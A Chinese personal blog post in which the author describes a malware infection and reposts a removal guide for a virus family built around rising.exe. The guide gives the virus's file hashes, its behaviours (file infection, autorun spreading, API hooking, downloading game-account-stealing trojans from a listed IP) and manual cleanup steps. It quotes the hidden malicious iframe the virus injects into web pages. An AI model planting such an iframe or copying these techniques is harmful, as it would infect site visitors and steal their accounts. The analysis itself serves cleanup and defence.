电脑上的卡巴过期了,也许是头脑发热,也许是公司网管一定要我们装咖啡的缘故,突然卸载了卡巴,装上了咖啡。
从此,开始了噩梦的旅程。咖啡不断的报毒,却永远也杀不掉,只有不断地受到它的报警骚扰。发现电脑里多出了N多的恶意软件和病毒,只有百度一下,自食其力。
先下了新的卡巴KEY,但发现重新装了卡巴后所有的KEY都过期,还以为下的KEY不好,后来发现不是(后话)。
重新启动F8进到了安全模式,C盘下的RISING.EXE(差点以为它是瑞星,可惜我从来不装瑞星,何来此软件?)导致C盘双击不开,无法显示隐藏文件。根据以往处理同类事件的经验,解决了无法显示隐藏文件可盘符无法双击打开的问题。在WINDOWS目录下发现N个不明EXE文件,全部删除之。还是觉得不放心,因为咖啡报过SYSTEM32的病毒,于是用家里的笔记本上网查看相关病毒查杀。发现这些个病毒居然是一家子。于是乎根据网络上一个牛人关于此类家族系病毒的查杀方法,一一处理之。方法在此转述,希望以后不要再有如此经历了。
另:此次出现的新问题是,系统时间被篡改,导致卡巴KEY不可用,SRENG(新发现的好用的系统修理软件)过期,时间调整过就OK了。
转:
cnzz.exe,Kvsc3.exe,winform.exe等 一直不停的报警发现不安全的进程,问是否终止.从不断弹出的报警来看,这不是一个病毒,而是一个母病毒不停的在释放种制造病毒进程.
用江民查C盘,找出了所有病毒,但是重启后仍然出现不停的报警的情况.
查看进程发现,有cnzz.exe,msccrt.exe,cmdbs.exe,mppds.exe,Kvsc3.exe,winform.exe一些不明进程在内存中.而且这其中的某些文件,杀毒;软件并不认为是病毒.
此时确认感染了不是一般的病毒,后来还发现,此病毒有以下作为:
1.感染exe 并使得被感染的exe的公司等属性变为 番茄花园
2.感染html asp 等文件 插入恶意代码
3.通过双击磁盘启动
4.下载木马,盗取网游帐号
5.修改注册表 使系统无法显示隐藏文件
6.通过hook API 函数 导致任务管理器中 无法看见其进程
7,修改系统时间有年份.
分析报告如下:
File:rising.exe
Size: 64775 bytes
File Version: 1.00
MD5: 86311B37D938BB35645E7B092014DD63
SHA1: 47C324A5A691DD31DC0410E51ADBD35065E6C7C3
CRC32: 88ABBD9B
rising.exe 运行后 首先释放一个rising.eve的文件 然后由rising.exe启动他
之后 释放139CA82A.EXE 139CA82A.dll(随机的8个数字字母组合成的文件名)到系统文件夹
注册服务139CA82A.EXE
139CA82A.EXE控制winlogon进程 使得139CA82A.dll插入几乎所有进程
释放rising.exe 和autorun.inf 到每个分区 使得双击磁盘启动
感染 除系统分区外的exe文件 使得其公司名全变为 番茄花园
感染 html asp 等文件 在其后面插入代码
<iframe src="http://web.yulett.cn/count.htm" width="0" height="0" frameborder="0"></iframe>
修改系统时间 随机把年份往前调 月,日不变
修改 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue:
值为 0x00000000
导致无法显示临时文件
rising.exe 还会hook 多个 API函数 使其进程在任务管理器中隐藏
使用Explorer.exe连接网络 61.152.92.98:80下载木马
下载的木马一般为K117815XXXXX.exe
XXXXX代表随机
到系统文件夹中
使用进程根踪器发现,K11****.exe程序与正在运行所有的程序相关联着.
解决办法:
安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)
首先把系统日期 改回来
然后打开sreng
启动项目 注册表 删除如下项目
<upxdnd><C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upxdnd.exe> []
<msccrt><C:\WINDOWS\msccrt.exe> []
<cmdbs><C:\WINDOWS\cmdbs.exe> []
<mppds><C:\WINDOWS\mppds.exe> []
<Kvsc3><C:\WINDOWS\Kvsc3.exe> []
<winform><C:\WINDOWS\winform.exe> []
<cnzz><C:\WINDOWS\cnzz.exe /i> []
“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”,
选中以下项目,点“删除服务”,再点“设置”,在弹出的框中点“否”:
139CA82A / 139CA82A
Wireless Zero Conflguration / inetsvr
把下面的 代码拷入记事本中然后另存为1.reg文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"RegPath"="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced"
"Text"="@shell32.dll,-30500"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000002
"HKeyRoot"=dword:80000001
"HelpID"="shell.hlp#51105"
双击1.reg把这个注册表项导入
然后双击我的电脑-工具-文件夹选项-查看-显示所有文件和文件夹,把“隐藏受保护的系统文件”的勾去掉。
右键 点击C盘 点击右键菜单中的“打开”打开C盘 (千万不要双击)(如图)
删除 如下文件
C:\rising.exe
C:\autorun.inf
C:\WINDOWS\system32\buchehuo.exe
C:\WINDOWS\system32\cmdbs.dll
C:\WINDOWS\cmdbs.exe
C:\WINDOWS\system32\Kvsc3.dll
C:\WINDOWS\Kvsc3.exe
C:\WINDOWS\system32\mppds.dll
C:\WINDOWS\mppds.exe
C:\WINDOWS\system32\msccrt.dll
C:\WINDOWS\msccrt.exe
C:\WINDOWS\system32\winform.dll
C:\WINDOWS\winform.exe
C:\WINDOWS\system32\winsock.exe
C:\WINDOWS\unspapik.txt
C:\WINDOWS\wiasevct.txt
C:\WINDOWS\wiasvctr.txt
C:\WINDOWS\ganran.txt
C:\WINDOWS\cnzz.exe
C:\WINDOWS\system32\cnzz.dll
C:\WINDOWS\system32\139CA82A.DLL(随机的8个数字字母组合成的文件名)
C:\WINDOWS\system32\139CA82A.EXE(随机的8个数字字母组合成的文件名)
C:\WINDOWS\system32\K117815XXXXX.exe(XXXXX代表随机数字)
清空C:\Documents and Settings\用户名\Local Settings\Temp
右键 点击分别打开系统分区以外的分区 还是点击右键菜单中的“打开” (千万不要双击)
删除每个分区下面的autorun.inf和rising.exe文件
先合并注册表,在运行:Myviker.bat
回复Comments
{commenttime}{commentauthor}
{CommentUrl}
{commentcontent}